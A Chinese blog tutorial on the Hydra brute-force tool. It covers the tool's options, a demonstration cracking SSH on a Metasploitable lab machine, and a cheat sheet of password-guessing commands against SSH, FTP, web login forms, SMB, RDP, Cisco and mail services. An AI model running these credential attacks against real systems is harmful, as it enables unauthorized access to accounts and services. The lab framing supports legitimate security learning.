爆破工具 Hydra 简单使用

关于Hydra

hydra 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可

hydra

以下是Hydra支持的协议

  • Asterisk
  • AFP
  • Cisco AAA
  • Cisco auth
  • Cisco enable
  • CVS
  • Firebird
  • FTP
  • HTTP-FORM-GET
  • HTTP-FORM-POST
  • HTTP-GET
  • HTTP-HEAD
  • HTTP-POST
  • HTTP-PROXY
  • HTTPS-FORM-GET
  • HTTPS-FORM-POST
  • HTTPS-GET
  • HTTPS-HEAD
  • HTTPS-POST
  • HTTP-Proxy
  • ICQ
  • IMAP
  • IRC
  • LDAP
  • MS-SQL
  • MYSQL
  • NCP
  • NNTP
  • Oracle Listener
  • Oracle SID
  • Oracle
  • PC-Anywhere
  • PCNFS
  • POP3
  • POSTGRES
  • RDP
  • Rexec
  • Rlogin
  • Rsh
  • RTSP
  • SAP/R3
  • SIP
  • SMB
  • SMTP
  • SMTP Enum
  • SNMP v1+v2+v3
  • SOCKS5
  • SSH (v1 and v2)
  • SSHKEY
  • Subversion
  • Teamspeak (TS2)
  • Telnet
  • VMware-Auth
  • VNC
  • XMPP

你可以在Github上找到它的源码: https://github.com/vanhauser-thc/thc-hydra

Hydra 使用

hydra 有两个版本

  1. 命令行版本
  2. GUI版本

其中GUI版本叫 xhydra,直接在终端中输入命令打开(或者在菜单中寻找打开)

xhdra   #打开xhydra
xhydra 使用

关于xhydra 的使用请参考 煜铭2011 的博文:密码破解神器-xhydra

此篇博文已经详细讲解了使用方法

hydra 的使用

使用以下命令查看工具的参数

hydra -h
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp http-{head|get|post} http-{get|post}-form http-proxy http-proxy-urlenum icq imap irc ldap2 ldap3[s] mssql mysql(v4) nntp pcanywhere pcnfs pop3 redis rexec rlogin rpcap rsh rtsp s7-300 smb smtp smtp-enum snmp socks5 teamspeak telnet vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1

参数详解

参数 用途
-l 指定单个用户名,适合在知道用户名爆破用户名密码时使用
-L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)
-p 指定单个密码,适合在知道密码爆破用户名时使用
-P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)
-C 当用户名和密码存储到一个文件时使用此参数。注意,文件(字典)存储的格式必须为 "用户名:密码" 的格式。
-M 指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 "地址:端口"
-t 指定爆破时的任务数量(可以理解为线程数),默认为16
-s 指定端口,适用于攻击目标端口非默认的情况。例如:http服务使用非80端口
-S 指定爆破时使用 SSL 链接
-R 继续从上一次爆破进度上继续爆破
-v/-V 显示爆破的详细信息
-f 一但爆破成功一个就停止爆破
server 代表要攻击的目标(单个),多个目标时请使用 -M 参数
service 攻击目标的服务类型(可以理解为爆破时使用的协议),例如 http ,在hydra中,不同协议会使用不同的模块来爆破,hydra 的 http-gethttp-post 模块就用来爆破基于 getpost 请求的页面
OPT 爆破模块的额外参数,可以使用 -U 参数来查看模块支持那些参数,例如命令:hydra -U http-get

实例:爆破ssh

出于演示目的,我使用 Metasploitable 来当靶机,爆破其 ssh

靶机IP:192.168.56.12
用户:user
user用户密码:user

先用 nmap 扫描靶机是否开放了 22 端口
选取爆破模块

爆破ssh当然是使用 ssh模块 啦,(模块一般和协议名称一致,可以查看本文开头列出的协议部分),
使用 -U 选项查看 ssh模块 是否需要额外的参数

hydra -U ssh

看来不需要额外参数。

选取爆破字典

字典什么的,网上有很多,搜索下载即可,如果懒得找,可以使用Kali自带的字典:/usr/share/wordlists/

/usr/share/wordlists/ 目录下带有多种类型的字典,这里就不详细说了,可以参考这篇博文:Kali 系统自带字典目录wordlists

用户字典:为了节省时间,我直接到靶机中查看有那些用户而不是使用用户字典
密码字典:我这里选用了码云上墨玉麒麟 收集的 字典库 中的 字典.txt

为什么选取 字典.txt 这个字典来爆破?
因为我这里只是出于演示目的,而字典.txt 这个字典只有 200 多条密码数据,符合我演示的目的
字典.txt 克隆到本地,重命名为 sshpasswd.list,存储在 /root/Work/ 目录中

开始爆破
hydra 192.168.56.12 ssh -l user -P /root/Work/sshpasswd.list -t 6 -V -f

命令详细:

  • 攻击目标:192.168.56.12
  • 使用的模块:ssh
  • 爆破用户名:user (-l)
  • 使用的密码字典:/root/Work/sshpasswd.list (-P)
  • 爆破线程数:6 (-t)
  • 显示详细信息 (-V)
  • 爆破成功一个后停止 (-f)

爆破成功


用户名和密码都是 user

验证

# 连接目标ssh
ssh user@192.168.56.12

注意:
在爆破过程中,要适当的使用爆破的线程数,因为ssh一般有连接数量的苛刻限制(比如连接数量不得超过4的),如果使用hydra默认的线程数,有些线程会连接失败,从而导致字典中有正确密码而无法爆破现象。
个人建议 爆破ssh使用的线程数是 4~7

其他协议的爆破就不一一列举了,以下是常用的一些爆破语句

1、破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 


2、破解ftp: 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 


3、get方式提交,破解web登录: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php


4、post方式提交,破解web登录: 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 


5、破解https: 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 

6、破解teamspeak: 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 

7、破解cisco: 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 

8、破解smb: 
hydra -l administrator -P pass.txt 10.36.16.18 smb 

9、破解pop3: 
hydra -l muts -P pass.txt my.pop3.mail pop3 

10、破解rdp: 
hydra ip rdp -l administrator -P pass.txt -V 

11、破解http-proxy: 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 

12、破解imap: 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

不喜欢看文章的可以看我的于简书同步的博客文章 爆破工具 Hydra 的简单使用中的使用视频

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,530评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,403评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,120评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,770评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,758评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,649评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,021评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,675评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,931评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,751评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,410评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,004评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,969评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,042评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,493评论 2 343

推荐阅读更多精彩内容